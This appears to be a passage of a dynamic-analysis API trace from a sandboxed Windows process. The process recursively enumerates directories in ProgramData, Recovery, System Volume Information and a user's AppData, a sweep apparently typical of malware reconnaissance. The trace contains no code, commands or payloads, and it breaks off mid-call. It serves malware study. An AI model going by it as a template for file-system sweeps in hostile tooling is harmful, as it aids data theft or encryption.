FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa32a28 [0140.163] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0xa328a8 [0140.163] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0140.163] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0140.163] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0140.163] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32c0050 | out: hHeap=0x20f0000) returned 1 [0140.163] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0140.163] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0140.164] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa32968 [0140.164] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa32a28 [0140.164] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\*", lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0xa328a8 [0140.164] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0140.164] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0140.164] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0140.165] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32c0050 | out: hHeap=0x20f0000) returned 1 [0140.165] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0140.165] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0140.166] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa32968 [0140.166] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa32a28 [0140.166] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*", lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0xa328a8 [0140.166] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0140.167] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0140.167] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0140.167] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32c0050 | out: hHeap=0x20f0000) returned 1 [0140.167] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0140.167] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0140.167] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa32968 [0140.168] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa32a28 [0140.168] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*", lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0xa328a8 [0140.169] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0140.169] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0140.169] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0140.169] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32c0050 | out: hHeap=0x20f0000) returned 1 [0140.169] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0140.169] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0140.170] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa32968 [0140.170] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa32a28 [0140.170] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0xa328a8 [0140.171] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0140.171] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0140.171] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0140.171] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32c0050 | out: hHeap=0x20f0000) returned 1 [0140.171] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0140.171] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0140.172] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa32968 [0140.172] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa32a28 [0140.172] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0xa328a8 [0140.173] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0140.173] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0140.173] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0140.173] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32c0050 | out: hHeap=0x20f0000) returned 1 [0140.173] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0140.173] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0140.284] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa32b28 [0140.285] FindClose (in: hFindFile=0xa32b28 | out: hFindFile=0xa32b28) returned 1 [0140.285] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3330088 | out: hHeap=0x20f0000) returned 1 [0140.285] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa32b28 [0140.285] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa32b68 [0140.285] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*", lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0xa329a8 [0140.285] FindClose (in: hFindFile=0xa329a8 | out: hFindFile=0xa329a8) returned 1 [0140.285] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3350098 | out: hHeap=0x20f0000) returned 1 [0140.286] FindClose (in: hFindFile=0xa32b68 | out: hFindFile=0xa32b68) returned 1 [0140.286] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3340090 | out: hHeap=0x20f0000) returned 1 [0140.286] FindClose (in: hFindFile=0xa32b28 | out: hFindFile=0xa32b28) returned 1 [0140.286] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3330088 | out: hHeap=0x20f0000) returned 1 [0140.286] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa32b28 [0140.286] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa32b68 [0140.286] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\*", lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0xa329a8 [0140.286] FindClose (in: hFindFile=0xa329a8 | out: hFindFile=0xa329a8) returned 1 [0140.286] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3350098 | out: hHeap=0x20f0000) returned 1 [0140.286] FindClose (in: hFindFile=0xa32b68 | out: hFindFile=0xa32b68) returned 1 [0140.287] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3340090 | out: hHeap=0x20f0000) returned 1 [0140.287] FindClose (in: hFindFile=0xa32b28 | out: hFindFile=0xa32b28) returned 1 [0140.287] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3330088 | out: hHeap=0x20f0000) returned 1 [0140.287] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa32b28 [0140.287] FindClose (in: hFindFile=0xa32b28 | out: hFindFile=0xa32b28) returned 1 [0140.287] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3330088 | out: hHeap=0x20f0000) returned 1 [0140.287] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa32b28 [0140.287] FindClose (in: hFindFile=0xa32b28 | out: hFindFile=0xa32b28) returned 1 [0140.287] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3330088 | out: hHeap=0x20f0000) returned 1 [0140.287] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa32b28 [0140.287] FindClose (in: hFindFile=0xa32b28 | out: hFindFile=0xa32b28) returned 1 [0140.288] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3330088 | out: hHeap=0x20f0000) returned 1 [0140.288] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa32b28 [0140.288] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa32b68 [0140.288] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0xa329a8 [0140.288] FindClose (in: hFindFile=0xa329a8 | out: hFindFile=0xa329a8) returned 1 [0140.288] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3350098 | out: hHeap=0x20f0000) returned 1 [0140.288] FindClose (in: hFindFile=0xa32b68 | out: hFindFile=0xa32b68) returned 1 [0140.288] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3340090 | out: hHeap=0x20f0000) returned 1 [0140.288] FindClose (in: hFindFile=0xa32b28 | out: hFindFile=0xa32b28) returned 1 [0140.288] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3330088 | out: hHeap=0x20f0000) returned 1 [0140.289] FindClose (in: hFindFile=0xa32928 | out: hFindFile=0xa32928) returned 1 [0140.289] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2247a58 | out: hHeap=0x20f0000) returned 1 [0140.290] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Start Menu\\*", lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0xffffffff [0140.290] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2247a58 | out: hHeap=0x20f0000) returned 1 [0140.290] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Sun\\*", lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0xa32928 [0140.291] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Sun\\Java\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa32b28 [0140.291] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa32b68 [0140.291] FindClose (in: hFindFile=0xa32b68 | out: hFindFile=0xa32b68) returned 1 [0140.291] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3340090 | out: hHeap=0x20f0000) returned 1 [0140.291] FindClose (in: hFindFile=0xa32b28 | out: hFindFile=0xa32b28) returned 1 [0140.291] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3330088 | out: hHeap=0x20f0000) returned 1 [0140.291] FindClose (in: hFindFile=0xa32928 | out: hFindFile=0xa32928) returned 1 [0140.291] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2247a58 | out: hHeap=0x20f0000) returned 1 [0140.292] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Templates\\*", lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0xffffffff [0140.292] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2247a58 | out: hHeap=0x20f0000) returned 1 [0140.292] FindClose (in: hFindFile=0xa328e8 | out: hFindFile=0xa328e8) returned 1 [0140.293] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32e0060 | out: hHeap=0x20f0000) returned 1 [0140.293] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Recovery\\*", lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 0xa328e8 [0140.293] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*", lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0xa32928 [0140.293] FindClose (in: hFindFile=0xa32928 | out: hFindFile=0xa32928) returned 1 [0140.293] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2247a58 | out: hHeap=0x20f0000) returned 1 [0140.293] FindClose (in: hFindFile=0xa328e8 | out: hFindFile=0xa328e8) returned 1 [0140.293] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32e0060 | out: hHeap=0x20f0000) returned 1 [0140.293] FindFirstFileW (in: lpFileName="\\\\?\\C:\\System Volume Information\\*", lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 0xffffffff [0140.293] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32e0060 | out: hHeap=0x20f0000) returned 1 [0140.293] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\*", lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 0xa328e8 [0140.293] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*", lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0xa32928 [0140.294] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa32b28 [0140.294] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa32b68 [0140.294] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\*", lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0xa329a8 [0140.295] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\*", lpFindFileData=0x253ed10 | out: lpFindFileData=0x253ed10) returned 0xa329e8 [0140.295] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x253ea8c | out: lpFindFileData=0x253ea8c) returned 0xa32ba8 [0140.296] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\*", lpFindFileData=0x253e808 | out: lpFindFileData=0x253e808) returned 0xa32be8 [0140.296] FindClose (in: hFindFile=0xa32be8 | out: hFindFile=0xa32be8) returned 1 [0140.296] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33800b0 | out: hHeap=0x20f0000) returned 1 [0140.296] FindClose (in: hFindFile=0xa32ba8 | out: hFindFile=0xa32ba8) returned 1 [0140.296] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33700a8 | out: hHeap=0x20f0000) returned 1 [0140.296] FindClose (in: hFindFile=0xa329e8 | out: hFindFile=0xa329e8) returned 1 [0140.296] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33600a0 | out: hHeap=0x20f0000) returned 1 [0140.296] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\*", lpFindFileData=0x253ed10 | out: lpFindFileData=0x253ed10) returned 0xa329e8 [0140.296] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\*", lpFindFileData=0x253ea8c | out: lpFindFileData=0x253ea8c) returned 0xa32ba8 [0140.296] FindClose (in: hFindFile=0xa32ba8 | out: hFindFile=0xa32ba8) returned 1 [0140.297] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33700a8 | out: hHeap=0x20f0000) returned 1 [0140.297] FindClose (in: hFindFile=0xa329e8 | out: hFindFile=0xa329e8) returned 1 [0140.297] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33600a0 | out: hHeap=0x20f0000) returned 1 [0140.297] FindClose (in: hFindFile=0xa329a8 | out: hFindFile=0xa329a8) returned 1 [0140.297] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3350098 | out: hHeap=0x20f0000) returned 1 [0140.297] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\*", lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0xffffffff [0140.297] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3350098 | out: hHeap=0x20f0000) returned 1 [0140.297] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\*", lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0xa329a8 [0140.297] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\*", lpFindFileData=0x253ed10 | out: lpFindFileData=0x253ed10) returned 0xa329e8 [0140.297] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\*", lpFindFileData=0x253ea8c | out: lpFindFileData=0x253ea8c) returned 0xa32ba8 [0140.297] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\*", lpFindFileData=0x253e808 | out: lpFindFileData=0x253e808) returned 0xa32be8 [0140.298] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\*", lpFindFileData=0x253e584 | out: lpFindFileData=0x253e584) returned 0xa32c28 [0140.298] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\*", lpFindFileData=0x253e300 | out: lpFindFileData=0x253e300) returned 0xa32c68 [0140.299] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\Data\\*", lpFindFileData=0x253e07c | out: lpFindFileData=0x253e07c) returned 0xa32ca8 [0140.299] FindClose (in: hFindFile=0xa32ca8 | out: hFindFile=0xa32ca8) returned 1 [0140.299] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33b00c8 | out: hHeap=0x20f0000) returned 1 [0140.299] FindClose (in: hFindFile=0xa32c68 | out: hFindFile=0xa32c68) returned 1 [0140.299] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33a00c0 | out: hHeap=0x20f0000) returned 1 [0140.299] FindClose (in: hFindFile=0xa32c28 | out: hFindFile=0xa32c28) returned 1 [0140.299] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0140.299] FindClose (in: hFindFile=0xa32be8 | out: hFindFile=0xa32be8) returned 1 [0140.300] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33800b0 | out: hHeap=0x20f0000) returned 1 [0140.300] FindClose (in: hFindFile=0xa32ba8 | out: hFindFile=0xa32ba8) returned 1 [0140.300] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33700a8 | out: hHeap=0x20f0000) returned 1 [0140.300] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\*", lpFindFileData=0x253ea8c | out: lpFindFileData=0x253ea8c) returned 0xa32ba8 [0140.300] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\*", lpFindFileData=0x253e808 | out: lpFindFileData=0x253e808) returned 0xa32be8 [0140.300] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\*", lpFindFileData=0x253e584 | out: lpFindFileData=0x253e584) returned 0xa32c28 [0140.300] FindClose (in: hFindFile=0xa32c28 | out: hFindFile=0xa32c28) returned 1 [0140.300] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0140.300] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\*", lpFindFileData=0x253e584 | out: lpFindFileData=0x253e584) returned 0xa32c28 [0145.619] FindClose (in: hFindFile=0xa32c28 | out: hFindFile=0xa32c28) returned 1 [0145.620] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0145.620] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\*", lpFindFileData=0x253e584 | out: lpFindFileData=0x253e584) returned 0xa32c28 [0149.796] FindClose (in: hFindFile=0xa32c28 | out: hFindFile=0xa32c28) returned 1 [0149.797] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0149.797] FindClose (in: hFindFile=0xa32be8 | out: hFindFile=0xa32be8) returned 1 [0149.797] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33800b0 | out: hHeap=0x20f0000) returned 1 [0149.797] FindClose (in: hFindFile=0xa32ba8 | out: hFindFile=0xa32ba8) returned 1 [0149.797] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33700a8 | out: hHeap=0x20f0000) returned 1 [0149.797] FindClose (in: hFindFile=0xa329e8 | out: hFindFile=0xa329e8) returned 1 [0149.797] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33600a0 | out: hHeap=0x20f0000) returned 1 [0149.798] FindClose (in: hFindFile=0xa329a8 | out: hFindFile=0xa329a8) returned 1 [0149.798] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3350098 | out: hHeap=0x20f0000) returned 1 [0149.800] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Deployment\\*", lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0xa329a8 [0149.800] FindClose (in: hFindFile=0xa329a8 | out: hFindFile=0xa329a8) returned 1 [0149.800] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3350098 | out: hHeap=0x20f0000) returned 1 [0149.800] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\*", lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0xa329a8 [0149.800] FindFirstFileW (in: 